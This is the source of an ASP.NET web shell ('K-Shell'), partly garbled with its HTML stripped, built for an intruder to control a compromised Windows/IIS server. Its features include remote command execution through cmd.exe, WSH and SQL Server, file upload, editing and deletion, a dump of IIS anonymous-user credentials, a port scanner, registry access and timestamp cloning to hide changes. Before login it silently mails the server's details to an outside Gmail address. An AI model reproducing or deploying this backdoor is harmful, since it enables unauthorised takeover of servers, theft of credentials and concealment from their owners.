<%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%> <%@ Import Namespace="System.IO" %> <%@ import namespace="System.Diagnostics" %> <%@ import namespace="System.Threading" %> <%@ import namespace="System.Text" %> <%@ import namespace="System.Security.Cryptography" %> <%@ Import Namespace="System.Net.Sockets"%> <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %> <%@ import Namespace="System.DirectoryServices" %> <%@ import Namespace="Microsoft.Win32" %> <% if request.QueryString("action")="down" and session("usersession")=1 then downTheFile(request.QueryString("src")) response.End() end if Dim act as string = request.QueryString("action") if act="cmd" then TITLE="CMD.NET" elseif act="cmdw32" then TITLE="ASP.NET W32 Shell" elseif act="cmdwsh" then TITLE="ASP.NET WSH Shell" elseif act="sqlrootkit" then TITLE="SqlRootKit.NET" elseif act="clonetime" then TITLE="Clone Time" elseif act="information" then TITLE="Web Server Info" elseif act="goto" then TITLE="K-Shell 1.2" elseif act="pro1" then TITLE="List processes from server" elseif act="pro2" then TITLE="List processes from server" elseif act="user" then TITLE="List User Accounts" elseif act="applog" then TITLE="List Application Event Log Entries" elseif act="syslog" then TITLE="List System Event Log Entries" elseif act="auser" then TITLE="IIS List Anonymous' User details" elseif act="sqlman" then TITLE="MSSQL Management" elseif act="scan" then TITLE="Port Scanner" elseif act="iisspy" then TITLE="IIS Spy" elseif act="sqltool" then TITLE="SQL Tool" elseif act="regshell" then TITLE="Registry Shell" else TITLE=request.ServerVariables("HTTP_HOST") end if %> <%=TITLE%> welcome !
<% Dim error_x as Exception Try if session("usersession")<>1 then 'Test sending anonymous mail, comment it if you don't want test it dim info As String Try info = request.ServerVariables.ToString.Replace("%2f","/").Replace("%5c","\").Replace("%3a",":").Replace("%2c",",").Replace("%3b",";").Replace("%3d","=").Replace("%2b","+").Replace("%0d%0a",vbnewline) System.Web.Mail.SmtpMail.SmtpServer = "localhost" System.Web.Mail.SmtpMail.Send(request.ServerVariables("HTTP_HOST"),"test.mail.address.2008@gmail.com",request.ServerVariables("HTTP_HOST")+request.ServerVariables("URL"),info) Catch End Try %>
Your Password:
<% else dim temp as string temp=request.QueryString("action") if temp="" then temp="goto" select case temp case "goto" if request.QueryString("src")<>"" then url=request.QueryString("src") else url=server.MapPath(".") & "\" end if call existdir(url) dim xdir as directoryinfo dim mydir as new DirectoryInfo(url) dim guru as string dim xfile as fileinfo dim ServerIP As string = "Server IP : " + Request.ServerVariables("LOCAL_ADDR") + " - Client IP : " + getIP() + " - " dim HostName As string = "HostName : " + Environment.MachineName + " - Username : "+ Environment.UserName +"
" dim OSVersion As string = "OS Version : " + Environment.OSVersion.ToString() + "" dim IISversion As string = " - IIS Version : " + Request.ServerVariables("SERVER_SOFTWARE") + "
System Dir : " + Environment.SystemDirectory + "" dim PATH_INFO As string = " - PATH_TRANSLATED : " + Request.ServerVariables("PATH_TRANSLATED") + "
" dim HARDWARE_INFO As string = "" Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables() Dim de As DictionaryEntry For Each de In environmentVariables if de.Key = "NUMBER_OF_PROCESSORS" then HARDWARE_INFO += "Hardware Info : " + de.Value + "CPU - " end if if de.Key = "PROCESSOR_IDENTIFIER" then HARDWARE_INFO += de.Value + "
" end if Next Info.Text += ServerIP + HostName + OSVersion + IISversion + PATH_INFO + HARDWARE_INFO %>

Currently Dir: <%=url%>
Operate: New - <%if session("cutboard")<>"" then%> Paste - <%else%> Paste - <%end if%> UpLoad - title="Go to this file's directory">GoBackDir - Quit
Go to: <% dim i as integer for i =0 to Directory.GetLogicalDrives().length-1 response.Write("" & Directory.GetLogicalDrives(i) & " ") next %> <% response.Write("IP:" & Request.ServerVariables("REMOTE_ADDR")&"") %>
Tool: SqlRootKit.NET - CMD.NET - kshellW32 - kshellWSH - CloneTime - System Info - List Processes 1 - List Processes 2
List User Accounts - IIS Anonymous User- Port Scanner - IIS Spy - Registry Shell - Application Event Log - System Log

" response.Write(guru) for each xdir in mydir.getdirectories() response.Write("") dim filepath as string filepath=server.UrlEncode(url & xdir.name) guru= "" response.Write(guru) response.Write("") response.Write("") guru="" response.Write(guru) response.Write("") next %>") guru="" response.Write(guru) guru="" response.Write(guru) response.Write("") guru="" response.Write(guru) response.Write("") next response.Write("
Name Size ModifyTime Operate
<% guru= "
|Parent Directory|
" & xdir.name & "" & Directory.GetLastWriteTime(url & xdir.name) & "Cut" & "|Copy|Del
<% for each xfile in mydir.getfiles() dim filepath2 as string filepath2=server.UrlEncode(url & xfile.name) response.Write("
" & xfile.name & "" & GetSize(xfile.length) & "" & file.GetLastWriteTime(url & xfile.name) & "Edit|Cut|Copy|Rename|Download|Del
") %> <% case "information" dim CIP,CP as string if getIP()<>request.ServerVariables("REMOTE_ADDR") then CIP=getIP() CP=request.ServerVariables("REMOTE_ADDR") else CIP=request.ServerVariables("REMOTE_ADDR") CP="None" end if %>
[ Web Server Information ] Back

Server IP <%=request.ServerVariables("LOCAL_ADDR")%>
Machine Name <%=Environment.MachineName%>
Network Name <%=Environment.UserDomainName.ToString()%>
User Name in this Process <%=Environment.UserName%>
OS Version <%=Environment.OSVersion.ToString()%>
Started Time <%=GetStartedTime(Environment.Tickcount)%> Hours
System Time <%=now%>
IIS Version <%=request.ServerVariables("SERVER_SOFTWARE")%>
HTTPS <%=request.ServerVariables("HTTPS")%>
PATH_INFO <%=request.ServerVariables("PATH_INFO")%>
PATH_TRANSLATED <%=request.ServerVariables("PATH_TRANSLATED")%>
SERVER_PORT <%=request.ServerVariables("SERVER_PORT")%>
SeesionID <%=Session.SessionID%>
Client Infomation
Client Proxy <%=CP%>
Client IP <%=CIP%>
User <%=request.ServerVariables("HTTP_USER_AGENT")%>
<% Create_table_row_with_supplied_colors("Black", "White", "center", "Environment Variables, Server Variables") %>
<% case "cmd" %>

[ CMD.NET for WebAdmin ] Back

Execute command with ASP.NET account(Notice: only click "Run" to run)

- This function has fixed by usersession.Antivirus has not detected (2007/02/27)-

Command:

<% case "cmdw32" %>

[ ASP.NET W32 Shell ] Back

Execute command with ASP.NET account using W32(Notice: only click "Run" to run)

<% Response.Write("System Dir : "+Environment.SystemDirectory +"

") %> CMD File: C:\\WINDOWS\\system32\\cmd.exe

Command:

<% case "cmdwsh" %>

[ ASP.NET WSH Shell ] Back

Execute command with ASP.NET account using WSH(Notice: only click "Run" to run)

Command:

<% case "pro1" %>

[ List processes from server ] Back

<% Try output_wmi_function_data("Win32_Process","ProcessId,Name,WorkingSetSize,HandleCount") Catch rw("This function is disabled by server") End Try %>
<% case "pro2" %>

[ List processes from server ] Back

" prostr += "" prostr += "" prostr += "" Next Catch ex As Exception Response.write(ex.Message) End Try Response.write(htmlbengin + prostr + htmlend) %>
<% Dim htmlbengin As String = "" Dim prostr As String = "" Dim htmlend As String = "
IDProcessMemorySizeThreads
" Try Dim mypro As Process() = Process.GetProcesses() For Each p As Process In mypro prostr += "
" + p.Id.ToString() + "" + p.ProcessName.ToString() + "" + p.WorkingSet.ToString() + "" + p.Threads.Count.ToString() + "
<% case "user" %>

[ List User Accounts ] Back

<% dim WMI_function = "Win32_UserAccount" dim Fields_to_load = "Name,Domain,FullName,Description,PasswordRequired,SID" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "reg" %>

[ Registry ] Back

<% dim WMI_function = "Win32_Registry" dim Fields_to_load = "Caption,CurrentSize,Description,InstallDate,Name,Status" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data(WMI_function,Fields_to_load) Catch rw(fail_description) End Try %>
<% case "applog" %>

[ List Application Event Log Entries ] Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='Application'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw(fail_description) End Try %>
<% case "syslog" %>

[ List System Event Log Entries ] Back

<% dim WMI_function = "Win32_NTLogEvent where Logfile='System'" dim Fields_to_load = "Logfile,Message,type" dim fail_description = " Access to " + WMI_function + " is protected" Try output_wmi_function_data_instances(WMI_function,Fields_to_load,2000) Catch rw("This function is disabled by server") End Try %>
<% case "auser" %>

[ IIS List Anonymous' User details ] Back

<% Try IIS_list_Anon_Name_Pass Catch rw("This function is disabled by server") End Try %>
<% case "scan" %>

[ ASP.NET Port Scanner ] Back

C# coded by Hackwol & Lenk, VB coded by usersession (19/08/2008)

Start IP : 127.0.0.1 --- End Ip : 127.0.0.1
Ports : 21,25,80,1433,3306,3389






<% case "iisspy" %>

[ IIS Spy ] Back

<% Try Response.write(IISSpy()) Catch rw("This function is disabled by server") End Try %> <% case "sqltool" %>

[ SQL Tool ] Back

<% Try Catch rw("This function is disabled by server") End Try %> <% case "regshell" %>

[ Registry Shell ] Back

Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName

Value: ComputerName

<% case "sqlman" %>

[ MSSQL Query ] Back

Execute query with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "sqlrootkit" %>

[ SqlRootKit.NET for WebAdmin ] Back

Execute command with SQLServer account(Notice: only click "Run" to run)

Host:

SQL Name: SQL Password:

Command:

<% case "del" dim a as string a=request.QueryString("src") call existdir(a) call del(a) response.Write("") case "copy" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "cut" call existdir(request.QueryString("src")) session("cutboard")="" & request.QueryString("src") response.Write("") case "paste" dim ow as integer if request.Form("OverWrite")<>"" then ow=1 if request.Form("Cancel")<>"" then ow=2 url=request.QueryString("src") call existdir(url) dim d as string d=session("cutboard") if left(d,1)="" then TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & replace(path.getfilename(d),"","") if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.move(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.move(replace(d,"",""),TEMP2) response.Write("") end if else TEMP1=url & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1)) TEMP2=url & path.getfilename(replace(d,"","")) if right(d,1)="\" then call xexistdir(TEMP1,ow) directory.createdirectory(TEMP1) call copydir(replace(d,"",""),TEMP1 & "\") response.Write("") else call xexistdir(TEMP2,ow) file.copy(replace(d,"",""),TEMP2) response.Write("") end if end if case "upfile" url=request.QueryString("src") %>
You will upload file to this directory : <%=url%>
Please choose file from your computer :
Go Back <% case "new" url=request.QueryString("src") %>
<%=url%>
Name:

Go Back <% case "edit" dim b as string b=request.QueryString("src") call existdir(b) dim myread as new streamreader(b,encoding.default) filepath.text=b content.text=myread.readtoend %>
Path *
Content
Go Back <% myread.close case "rename" url=request.QueryString("src") if request.Form("name")="" then %>
" onSubmit="return checkname();">

You will rename <%=request.QueryString("src")%>to: <%=getparentdir(request.QueryString("src"))%>

Go Back <% else if Rename() then response.Write("") else response.Write("") end if end if case "samename" url=request.QueryString("src") %>

Exist the same name file , can you overwrite ?(If you click " no" , it will auto add a number as prefix)

Go Back <% case "clonetime" time1.Text=request.QueryString("src")&"kshell.aspx" time2.Text=request.QueryString("src") %>

[CloneTime for WebAdmin] Back

A tool that it copy the file or directory's time to another file or directory

Rework File or Dir:

Copied File or Dir:

<% case "logout" session.Abandon() response.Write(" ÿÿÿÿÿÿÿÿÿÿÿÿ